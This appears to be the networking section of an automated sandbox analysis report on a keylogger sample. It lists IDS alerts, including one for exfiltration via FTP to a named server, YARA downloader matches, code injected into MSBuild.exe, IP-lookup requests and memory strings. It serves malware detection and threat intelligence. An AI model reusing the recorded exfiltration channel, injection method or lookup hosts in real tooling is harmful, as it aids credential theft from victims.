Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B40B99h	21_2_06B408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B476F9h	21_2_06B47450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B402E9h	21_2_06B40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B45869h	21_2_06B455C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B47FA9h	21_2_06B47D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B48401h	21_2_06B48158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06B453E9h	21_2_06B45140

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.10:49833 -> 50.31.176.103:21

Yara detected Generic Downloader

Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4117110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam.exe.4137b30.4.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.10:49844 -> 50.31.176.103:33933

Source: global traffic	TCP traffic: 192.168.2.10:63266 -> 162.159.36.2:53
Source: global traffic	TCP traffic: 192.168.2.10:61986 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: SERVERCENTRALUS SERVERCENTRALUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49759 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49742 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49720 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49719 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49706 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49753 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49778 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49800 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49788 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49822 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49786 -> 188.114.96.3:443

Source: unknown

FTP traffic detected: 50.31.176.103:21 -> 192.168.2.10:49833 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 500 allowed.220-Local time is now 10:15. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49726 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 197.87.175.4.in-addr.arpa

Source: MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003226000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003275000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: zam.exe, 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: zam.exe, 00000000.00000002.1310701258.0000000002808000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HaNkyQWPIIzrnC.exe, 00000011.00000002.1351377685.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXV.
Source: MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003275000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: zam.exe, 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, HaNkyQWPIIzrnC.exe, 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90
Source: MSBuild.exe, 00000010.00000002.3722282255.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.3722282255.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.0000000003275000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000332D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.000000000331E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000015.00000002.3722196852.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
